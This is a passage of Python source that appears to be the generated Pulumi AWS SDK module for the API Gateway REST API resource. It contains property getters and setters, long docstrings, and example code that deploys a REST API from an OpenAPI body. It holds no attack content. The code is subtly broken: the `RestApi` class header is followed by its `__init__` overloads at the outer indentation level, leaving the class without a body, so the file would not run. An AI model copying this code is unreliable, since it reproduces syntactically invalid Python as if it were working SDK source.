            ("parameters", parameters),
            ("policy", policy),
            ("tags", tags),
        )
        for attr_name, attr_value in optional_args:
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="apiKeySource")
    def api_key_source(self) -> Optional[pulumi.Input[str]]:
        """API key source for requests: `HEADER` (default) or `AUTHORIZER`; overrides the imported OpenAPI value when set."""
        return pulumi.get(self, "api_key_source")

    @api_key_source.setter
    def api_key_source(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_key_source", value)

    @property
    @pulumi.getter(name="binaryMediaTypes")
    def binary_media_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Binary media types supported by the REST API (default: UTF-8-encoded text payloads only)."""
        return pulumi.get(self, "binary_media_types")

    @binary_media_types.setter
    def binary_media_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "binary_media_types", value)

    @property
    @pulumi.getter
    def body(self) -> Optional[pulumi.Input[str]]:
        """OpenAPI specification that defines the REST API's routes and integrations; replaces non-overridden REST API configuration."""
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Description of the REST API (maps to OpenAPI `info.description`)."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="disableExecuteApiEndpoint")
    def disable_execute_api_endpoint(self) -> Optional[pulumi.Input[bool]]:
        """Whether the default `execute-api` endpoint is disabled, forcing clients onto a custom domain name (defaults to `false`)."""
        return pulumi.get(self, "disable_execute_api_endpoint")

    @disable_execute_api_endpoint.setter
    def disable_execute_api_endpoint(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disable_execute_api_endpoint", value)

    @property
    @pulumi.getter(name="endpointConfiguration")
    def endpoint_configuration(self) -> Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]:
        """Configuration block defining API endpoint configuration including endpoint type."""
        return pulumi.get(self, "endpoint_configuration")

    @endpoint_configuration.setter
    def endpoint_configuration(self, value: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]):
        pulumi.set(self, "endpoint_configuration", value)

    @property
    @pulumi.getter(name="minimumCompressionSize")
    def minimum_compression_size(self) -> Optional[pulumi.Input[int]]:
        """Minimum response size to compress: `-1` (compression disabled, default) through `10485760` (10MB)."""
        return pulumi.get(self, "minimum_compression_size")

    @minimum_compression_size.setter
    def minimum_compression_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "minimum_compression_size", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Name of the REST API (maps to OpenAPI `info.title`)."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """Customizations applied when importing the `body` specification (e.g. set `ignore` equal to `documentation`)."""
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "parameters", value)

    @property
    @pulumi.getter
    def policy(self) -> Optional[pulumi.Input[str]]:
        """JSON policy document controlling access to the API Gateway; prefer the `apigateway.RestApiPolicy` resource."""
        return pulumi.get(self, "policy")

    @policy.setter
    def policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "policy", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """Key-value map of resource tags; matching keys overwrite provider-level `default_tags` entries."""
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _RestApiState:
    """
    Input properties used for looking up and filtering `RestApi` resources.

    Every field is optional; only the values that are known need to be
    supplied. The `@pulumi.input_type` decorator derives the wire-level
    property names from the `@pulumi.getter(name=...)` annotations below.
    """

    def __init__(__self__, *,
                 api_key_source: Optional[pulumi.Input[str]] = None,
                 arn: Optional[pulumi.Input[str]] = None,
                 binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 created_date: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
                 endpoint_configuration: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']] = None,
                 execution_arn: Optional[pulumi.Input[str]] = None,
                 minimum_compression_size: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 policy: Optional[pulumi.Input[str]] = None,
                 root_resource_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering RestApi resources.
        :param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[str] arn: Amazon Resource Name (ARN)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
        :param pulumi.Input[str] created_date: The creation date of the REST API
        :param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input['RestApiEndpointConfigurationArgs'] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
        :param pulumi.Input[str] execution_arn: The execution ARN part to be used in `lambda_permission`'s `source_arn`
               when allowing API Gateway to invoke a Lambda function,
               e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
        :param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
        :param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        :param pulumi.Input[str] root_resource_id: The resource ID of the REST API's root
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
        """
        # Only record properties that were explicitly provided; pulumi.set
        # stores each value in the translated property bag read by pulumi.get.
        if api_key_source is not None:
            pulumi.set(__self__, "api_key_source", api_key_source)
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if binary_media_types is not None:
            pulumi.set(__self__, "binary_media_types", binary_media_types)
        if body is not None:
            pulumi.set(__self__, "body", body)
        if created_date is not None:
            pulumi.set(__self__, "created_date", created_date)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if disable_execute_api_endpoint is not None:
            pulumi.set(__self__, "disable_execute_api_endpoint", disable_execute_api_endpoint)
        if endpoint_configuration is not None:
            pulumi.set(__self__, "endpoint_configuration", endpoint_configuration)
        if execution_arn is not None:
            pulumi.set(__self__, "execution_arn", execution_arn)
        if minimum_compression_size is not None:
            pulumi.set(__self__, "minimum_compression_size", minimum_compression_size)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parameters is not None:
            pulumi.set(__self__, "parameters", parameters)
        if policy is not None:
            pulumi.set(__self__, "policy", policy)
        if root_resource_id is not None:
            pulumi.set(__self__, "root_resource_id", root_resource_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tags_all is not None:
            pulumi.set(__self__, "tags_all", tags_all)

    @property
    @pulumi.getter(name="apiKeySource")
    def api_key_source(self) -> Optional[pulumi.Input[str]]:
        """
        Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "api_key_source")

    @api_key_source.setter
    def api_key_source(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_key_source", value)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN)
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="binaryMediaTypes")
    def binary_media_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "binary_media_types")

    @binary_media_types.setter
    def binary_media_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "binary_media_types", value)

    @property
    @pulumi.getter
    def body(self) -> Optional[pulumi.Input[str]]:
        """
        OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
        """
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter(name="createdDate")
    def created_date(self) -> Optional[pulumi.Input[str]]:
        """
        The creation date of the REST API
        """
        return pulumi.get(self, "created_date")

    @created_date.setter
    def created_date(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "created_date", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="disableExecuteApiEndpoint")
    def disable_execute_api_endpoint(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "disable_execute_api_endpoint")

    @disable_execute_api_endpoint.setter
    def disable_execute_api_endpoint(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disable_execute_api_endpoint", value)

    @property
    @pulumi.getter(name="endpointConfiguration")
    def endpoint_configuration(self) -> Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]:
        """
        Configuration block defining API endpoint configuration including endpoint type. Defined below.
        """
        return pulumi.get(self, "endpoint_configuration")

    @endpoint_configuration.setter
    def endpoint_configuration(self, value: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]):
        pulumi.set(self, "endpoint_configuration", value)

    @property
    @pulumi.getter(name="executionArn")
    def execution_arn(self) -> Optional[pulumi.Input[str]]:
        """
        The execution ARN part to be used in `lambda_permission`'s `source_arn`
        when allowing API Gateway to invoke a Lambda function,
        e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
        """
        return pulumi.get(self, "execution_arn")

    @execution_arn.setter
    def execution_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "execution_arn", value)

    @property
    @pulumi.getter(name="minimumCompressionSize")
    def minimum_compression_size(self) -> Optional[pulumi.Input[int]]:
        """
        Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "minimum_compression_size")

    @minimum_compression_size.setter
    def minimum_compression_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "minimum_compression_size", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "parameters", value)

    @property
    @pulumi.getter
    def policy(self) -> Optional[pulumi.Input[str]]:
        """
        JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
        """
        return pulumi.get(self, "policy")

    @policy.setter
    def policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "policy", value)

    @property
    @pulumi.getter(name="rootResourceId")
    def root_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The resource ID of the REST API's root
        """
        return pulumi.get(self, "root_resource_id")

    @root_resource_id.setter
    def root_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "root_resource_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tagsAll")
    def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of tags assigned to the resource, including those inherited from the provider.
        """
        return pulumi.get(self, "tags_all")

    @tags_all.setter
    def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags_all", value)
class RestApi(pulumi.CustomResource):
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             api_key_source: Optional[pulumi.Input[str]] = None,
             binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             body: Optional[pulumi.Input[str]] = None,
             description: Optional[pulumi.Input[str]] = None,
             disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
             endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
             minimum_compression_size: Optional[pulumi.Input[int]] = None,
             name: Optional[pulumi.Input[str]] = None,
             parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             policy: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             __props__=None):
    """
    Manages an API Gateway REST API. The REST API can be configured via [importing an OpenAPI specification](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html) in the `body` argument (with other arguments serving as overrides) or via other provider resources to manage the resources (`apigateway.Resource` resource), methods (`apigateway.Method` resource), integrations (`apigateway.Integration` resource), etc. of the REST API. Once the REST API is configured, the `apigateway.Deployment` resource can be used along with the `apigateway.Stage` resource to publish the REST API.

    > **Note:** Amazon API Gateway Version 1 resources are used for creating and deploying REST APIs. To create and deploy WebSocket and HTTP APIs, use Amazon API Gateway Version 2.

    ## Example Usage
    ### OpenAPI Specification

    ```python
    import pulumi
    import hashlib
    import json
    import pulumi_aws as aws

    example_rest_api = aws.apigateway.RestApi("exampleRestApi",
        body=json.dumps({
            "openapi": "3.0.1",
            "info": {
                "title": "example",
                "version": "1.0",
            },
            "paths": {
                "/path1": {
                    "get": {
                        "x-amazon-apigateway-integration": {
                            "httpMethod": "GET",
                            "payloadFormatVersion": "1.0",
                            "type": "HTTP_PROXY",
                            "uri": "https://ip-ranges.amazonaws.com/ip-ranges.json",
                        },
                    },
                },
            },
        }),
        endpoint_configuration=aws.apigateway.RestApiEndpointConfigurationArgs(
            types=["REGIONAL"],
        ))
    example_deployment = aws.apigateway.Deployment("exampleDeployment",
        rest_api=example_rest_api.id,
        triggers={
            "redeployment": example_rest_api.body.apply(lambda body: json.dumps(body)).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
        })
    example_stage = aws.apigateway.Stage("exampleStage",
        deployment=example_deployment.id,
        rest_api=example_rest_api.id,
        stage_name="example")
    ```
    ### Resources

    ```python
    import pulumi
    import hashlib
    import json
    import pulumi_aws as aws

    example_rest_api = aws.apigateway.RestApi("exampleRestApi")
    example_resource = aws.apigateway.Resource("exampleResource",
        parent_id=example_rest_api.root_resource_id,
        path_part="example",
        rest_api=example_rest_api.id)
    example_method = aws.apigateway.Method("exampleMethod",
        authorization="NONE",
        http_method="GET",
        resource_id=example_resource.id,
        rest_api=example_rest_api.id)
    example_integration = aws.apigateway.Integration("exampleIntegration",
        http_method=example_method.http_method,
        resource_id=example_resource.id,
        rest_api=example_rest_api.id,
        type="MOCK")
    example_deployment = aws.apigateway.Deployment("exampleDeployment",
        rest_api=example_rest_api.id,
        triggers={
            "redeployment": pulumi.Output.all(example_resource.id, example_method.id, example_integration.id).apply(lambda example_resource_id, example_method_id, example_integration_id: json.dumps([
                example_resource_id,
                example_method_id,
                example_integration_id,
            ])).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
        })
    example_stage = aws.apigateway.Stage("exampleStage",
        deployment=example_deployment.id,
        rest_api=example_rest_api.id,
        stage_name="example")
    ```

    ## Import

    `aws_api_gateway_rest_api` can be imported by using the REST API ID, e.g.,

    ```sh
    $ pulumi import aws:apigateway/restApi:RestApi example 12345abcde
    ```

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
    :param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
    :param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
    :param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
    """
    ...
@overload
def __init__(__self__,
             resource_name: str,
             args: Optional[RestApiArgs] = None,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Manages an API Gateway REST API. The REST API can be configured via [importing an OpenAPI specification](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html) in the `body` argument (with other arguments serving as overrides) or via other provider resources to manage the resources (`apigateway.Resource` resource), methods (`apigateway.Method` resource), integrations (`apigateway.Integration` resource), etc. of the REST API. Once the REST API is configured, the `apigateway.Deployment` resource can be used along with the `apigateway.Stage` resource to publish the REST API.

    > **Note:** Amazon API Gateway Version 1 resources are used for creating and deploying REST APIs. To create and deploy WebSocket and HTTP APIs, use Amazon API Gateway Version 2.

    ## Example Usage
    ### OpenAPI Specification

    ```python
    import pulumi
    import hashlib
    import json
    import pulumi_aws as aws

    example_rest_api = aws.apigateway.RestApi("exampleRestApi",
        body=json.dumps({
            "openapi": "3.0.1",
            "info": {
                "title": "example",
                "version": "1.0",
            },
            "paths": {
                "/path1": {
                    "get": {
                        "x-amazon-apigateway-integration": {
                            "httpMethod": "GET",
                            "payloadFormatVersion": "1.0",
                            "type": "HTTP_PROXY",
                            "uri": "https://ip-ranges.amazonaws.com/ip-ranges.json",
                        },
                    },
                },
            },
        }),
        endpoint_configuration=aws.apigateway.RestApiEndpointConfigurationArgs(
            types=["REGIONAL"],
        ))
    example_deployment = aws.apigateway.Deployment("exampleDeployment",
        rest_api=example_rest_api.id,
        triggers={
            "redeployment": example_rest_api.body.apply(lambda body: json.dumps(body)).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
        })
    example_stage = aws.apigateway.Stage("exampleStage",
        deployment=example_deployment.id,
        rest_api=example_rest_api.id,
        stage_name="example")
    ```
    ### Resources

    ```python
    import pulumi
    import hashlib
    import json
    import pulumi_aws as aws

    example_rest_api = aws.apigateway.RestApi("exampleRestApi")
    example_resource = aws.apigateway.Resource("exampleResource",
        parent_id=example_rest_api.root_resource_id,
        path_part="example",
        rest_api=example_rest_api.id)
    example_method = aws.apigateway.Method("exampleMethod",
        authorization="NONE",
        http_method="GET",
        resource_id=example_resource.id,
        rest_api=example_rest_api.id)
    example_integration = aws.apigateway.Integration("exampleIntegration",
        http_method=example_method.http_method,
        resource_id=example_resource.id,
        rest_api=example_rest_api.id,
        type="MOCK")
    example_deployment = aws.apigateway.Deployment("exampleDeployment",
        rest_api=example_rest_api.id,
        triggers={
            "redeployment": pulumi.Output.all(example_resource.id, example_method.id, example_integration.id).apply(lambda example_resource_id, example_method_id, example_integration_id: json.dumps([
                example_resource_id,
                example_method_id,
                example_integration_id,
            ])).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
        })
    example_stage = aws.apigateway.Stage("exampleStage",
        deployment=example_deployment.id,
        rest_api=example_rest_api.id,
        stage_name="example")
    ```

    ## Import

    `aws_api_gateway_rest_api` can be imported by using the REST API ID, e.g.,

    ```sh
    $ pulumi import aws:apigateway/restApi:RestApi example 12345abcde
    ```

    :param str resource_name: The name of the resource.
    :param RestApiArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """
    Dispatch construction to `_internal_init`.

    Accepts either of the two `@overload` signatures above: a `RestApiArgs`
    object (with optional `opts`), or plain keyword arguments.
    """
    resource_args, opts = _utilities.get_resource_args_opts(RestApiArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is None:
        # Keyword-argument form: forward positionals/keywords untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object form: expand the args object into keyword arguments.
